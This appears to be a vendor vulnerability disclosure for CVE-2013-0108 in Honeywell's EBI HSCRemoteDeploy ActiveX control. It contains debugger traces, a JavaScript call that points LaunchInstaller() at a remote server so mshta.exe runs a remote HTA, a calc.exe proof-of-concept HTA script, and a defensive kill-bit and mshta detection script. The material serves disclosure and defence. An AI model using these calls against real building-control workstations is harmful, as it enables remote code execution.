Today, we present to you a new vulnerability, CVE-2013-0108, discovered in Honeywell Enterprise Buildings Integrator (EBI) R310 - R410.2. This platform is used to integrate different systems and devices such as heating, ventilation, and air conditioning (HVAC) controls; security; access control; life safety; lighting; energy management; and facilities management into a common platform. Using open architecture and industry standards, EBI integrates existing building systems, providing seamless digital information and control across all building operational management systems. Following our standard disclosure policy, we notified both Honeywell and CERT/CC, who in turn coordinated with ICS-CERT. Quoting from the ICS-CERT advisory ICSA-13-053-02:

Exploitation of this vulnerability could allow partial loss of availability, integrity, and confidentiality and could be exploited remotely. This vulnerability could affect systems deployed in the government facilities and commercial facilities sectors.

The vulnerability could allow remote attackers to execute arbitrary code via a specially crafted HTML document. The attacker would require an end-user or operator to voluntarily interact with the attack mechanism for it to be successful. For example, the attacker could send an email message to the end-user, containing a link to a Web site with the specially crafted HTML document. CVE-2013-0108 has been assigned to this vulnerability with a CVSS v2 base score of 6.8.

Now, before you read any further, if you own or operate one of these building control systems, you really should take a few moments and spend quality time with your Honeywell sales and service representative to ask about getting the latest Station Security Update Package. When we first reported this to Honeywell, their responsiveness and concern were both prompt and thorough, so it's clear to all of us at Rapid7 that Honeywell definitely has their customers' security interests at heart. From a disclosure standpoint, Honeywell's response was A, would exploit again. (:

Vulnerability Summary

The specific flaw exists within the HSC Remote Deploy ActiveX (HSCRemoteDeploy.dll), with the class ID "0D080D7D-28D2-4F86-BFA1-D582E5CE4867". This control is used to support installation of Honeywell HMIWeb Browser on workstation clients. The LaunchInstaller() method, provided by the vulnerable control, can be abused to run an arbitrary HTA application through mshta.exe.

Disclosure Timeline

| Date | Description |
|---|---|
| 2013-01-08 | Initial discovery by Juan Vazquez, Metasploit Researcher |
| 2013-01-08 | Metasploit module written |
| 2013-01-10 | Initial disclosure to the vendor, Honeywell |
| 2013-01-10 | Initial response from the vendor |
| 2013-01-25 | Disclosure to CERT/CC |
| 2013-01-30 | Disclosure coordination with vendor, CERT/CC, and ICS-CERT |
| 2013-02-04 | Vendor advisory bulletin and patch drafted |
| 2013-02-22 | Vendor advisory bulletin and patch release |
| 2013-02-22 | ICS-CERT Advisory published |
| 2013-03-11 | Public disclosure and Metasploit modules published |
| 2013-03-12 | Kill bits released on Microsoft Patch Tuesday (proposed) |
| 2013-03-14 | ICS-CERT Advisory updated |

Technical Analysis

A remote page can make Internet Explorer load the vulnerable ActiveX control by referencing its class ID:

The vulnerable ActiveX control will be loaded by Internet Explorer:

```
0:006> g
ModLoad: 020b0000 020e7000   C:\WINDOWS\system32\HSCRemoteDeploy.dll
eax=00000003 ebx=00000000 ecx=020de070 edx=f20b0000 esi=00255ba8 edi=00000000
eip=7c90e4f4 esp=00137dc0 ebp=00137eb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!KiFastSystemCallRet:
7c90e4f4 c3              ret
0:000> lmv m HSCRemoteDeploy
start    end        module name
020b0000 020e7000   HSCRemoteDeploy   (deferred)
    Image path: C:\WINDOWS\system32\HSCRemoteDeploy.dll
    Image name: HSCRemoteDeploy.dll
    Timestamp:        Wed Sep 29 13:51:06 2010 (4CA3282A)
    CheckSum:         0003DCC8
    ImageSize:        00037000
    File version:     5.7.165.119
    Product version:  5.7.165.119
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Honeywell Limited
    ProductName:      HMIWeb
    FileVersion:      5, 7, 165, 119
    PrivateBuild:     Official build
    FileDescription:  Unicode Release Build
    LegalCopyright:   Copyright 2008 Honeywell International Sàrl
    LegalTrademarks:  Copyright 2008 Honeywell International Sàrl
```

Once loaded, the LaunchInstaller() method can be used to execute an arbitrary remote HTA application by passing an arbitrary URI as its first parameter, bstrServer. The prototype for this method is:

```vb
Sub LaunchInstaller (
    ByVal bstrServer   As String,
    ByVal bstrRedirect As String,
    ByVal bUpgrade     As Boolean )
```

It can be abused in code such as:

```javascript
RemoteInstaller.LaunchInstaller("http://192.168.1.128:8080", "", false);
```

The LaunchInstaller() call above results in the following call to ShellExecuteExW, with a pointer to the SHELLEXECUTEINFO structure at 0013e200 as its argument:

```
0:000> bp HSCRemoteDeploy+866A
0:000> g
Breakpoint 0 hit
eax=020d2644 ebx=0210246c ecx=021023e8 edx=0013e200 esi=00000000 edi=0013e26c
eip=020b866a esp=0013e1ec ebp=0013e254 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
HSCRemoteDeploy!DllUnregisterServer+0x2e4a:
020b866a ff10            call    dword ptr [eax]      ds:0023:020d2644=d68d0b02
0:000> t
eax=020d2644 ebx=0210246c ecx=021023e8 edx=0013e200 esi=00000000 edi=0013e26c
eip=020b8dd6 esp=0013e1e8 ebp=0013e254 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
HSCRemoteDeploy!DllUnregisterServer+0x35b6:
020b8dd6 ff253c120d02    jmp     dword ptr [HSCRemoteDeploy!DllUnregisterServer+0x1ba1c (020d123c)] ds:0023:020d123c={SHELL32!ShellExecuteExW (7ca02f03)}
0:000> dd esp L2
0013e1e8  020b866c 0013e200
```

The SHELLEXECUTEINFO structure passed as the parameter contains the following values:

| Field | Value |
|---|---|
| lpVerb | open |
| lpFile | C:\WINDOWS\system32\mshta.exe |
| lpParameters | http://192.168.1.128:8080/System/Displays/RemoteInstallWelcome.hta |

```
0:000> du poi(0013e200+C)
021040ac  "open"
0:000> du poi(0013e200+10)
0210246c  "C:\WINDOWS\system32\mshta.exe"
0:000> du poi(0013e200+14)
02104014  "http://192.168.1.128:8080/System"
02104054  "Displays/RemoteInstallWelcome.ht"
02104094  "a"
```

The location of the HTA application to be opened via mshta.exe can be influenced by the "bstrServer" parameter, which leads to remote HTA code execution.
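As an added defensive example (not part of the Rapid7 post or the Metasploit module), the Python below does two things a practitioner would want after the analysis above: it checks a .reg-style export of the ActiveX Compatibility key for the kill bit (0x400 in "Compatibility Flags") on the control's CLSID, and it flags process-creation events where iexplore.exe spawns mshta.exe with a remote URL, which is exactly the process tree the ShellExecuteExW call above produces. The log line format and the sample registry export and log lines are constructed for this example.

```python
import re
# CLSID of the vulnerable control (from the advisory); Microsoft's kill bit is the 0x400
# flag in "Compatibility Flags" under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}.
HSC_REMOTE_DEPLOY_CLSID = "{0D080D7D-28D2-4F86-BFA1-D582E5CE4867}"
KILL_BIT = 0x400
KEY_RE = re.compile(r"^\[.*\\ActiveX Compatibility\\(\{[0-9A-Fa-f-]+\})\]$")
FLAG_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9A-Fa-f]{8})$')
# Hypothetical process-creation log format (constructed): parent=<path> image=<path> cmdline="<cmd>"
LOG_RE = re.compile(r'parent=(?P<parent>.+?)\s+image=(?P<image>.+?)\s+cmdline="(?P<cmd>[^"]*)"')

def killbit_set(reg_export, clsid=HSC_REMOTE_DEPLOY_CLSID):
    """Parse a .reg-style export of the ActiveX Compatibility key and report whether
    the kill bit is set for clsid (False if the key or the value is absent)."""
    current = None
    for raw in reg_export.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1).upper()
            continue
        m = FLAG_RE.match(line)
        if m and current == clsid.upper():
            return bool(int(m.group(1), 16) & KILL_BIT)
    return False

def suspicious_mshta(log_lines):
    """Return command lines of mshta.exe started by iexplore.exe with a remote http(s)
    URL: the process tree LaunchInstaller() produces via ShellExecuteExW."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        parent = m["parent"].lower().rsplit("\\", 1)[-1]
        image = m["image"].lower().rsplit("\\", 1)[-1]
        if image == "mshta.exe" and parent == "iexplore.exe" and re.search(r"https?://", m["cmd"], re.I):
            hits.append(m["cmd"])
    return hits

# Constructed sample data: a kill-bitted export, and two launches of which only the first matches.
SAMPLE_REG = """[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{0D080D7D-28D2-4F86-BFA1-D582E5CE4867}]
"Compatibility Flags"=dword:00000400
"""
SAMPLE_LOGS = [
    'parent=C:\\Program Files\\Internet Explorer\\iexplore.exe image=C:\\WINDOWS\\system32\\mshta.exe cmdline="http://192.168.1.128:8080/System/Displays/RemoteInstallWelcome.hta"',
    'parent=C:\\WINDOWS\\explorer.exe image=C:\\WINDOWS\\system32\\mshta.exe cmdline="C:\\Tools\\local.hta"',
]
```

On a real host, feed killbit_set() the output of exporting the ActiveX Compatibility key with reg.exe, and point suspicious_mshta() at your EDR or Sysmon process-creation events after mapping their fields to the constructed format.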

Exploitation

Since an arbitrary HTA application can be executed, arbitrary code execution follows. Quoting the MSDN article Introduction to HTML Applications (HTAs):

As fully trusted applications, HTAs carry out actions that Internet Explorer would never permit in a webpage. The result is an application that runs seamlessly, without interruption.

In HTAs, the restrictions against allowing script to manipulate the client machine are lifted. For example, all command codes are supported without scripting limitations (see command id). And HTAs have read/write access to the files and system registry on the client machine.

The trusted status of HTAs also extends to all operations subject to security zone options. In short, zone security is off. Consequently, HTAs run embedded Microsoft ActiveX controls and Java applets irrespective of the zone security setting on the client machine. No warning displays before such objects are run within an HTA. HTAs run outside of the Internet Explorer process, and therefore are not subject to the security restrictions imposed by Protected Mode when run on Windows Vista.

As a simple proof of concept, the following HTA script can be used to launch calc.exe:

```javascript
// Proof-of-concept HTA script body: start calc.exe through WScript.Shell, then close the HTA window.
a = new ActiveXObject("WScript.Shell");
a.run('%windir%\\System32\\calc.exe');
window.close();
```

In order to achieve remote code execution, a Metasploit module has been developed. The module has been tested successfully on Windows XP and Windows 7 with Internet Explorer 6 through Internet Explorer 9.

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions.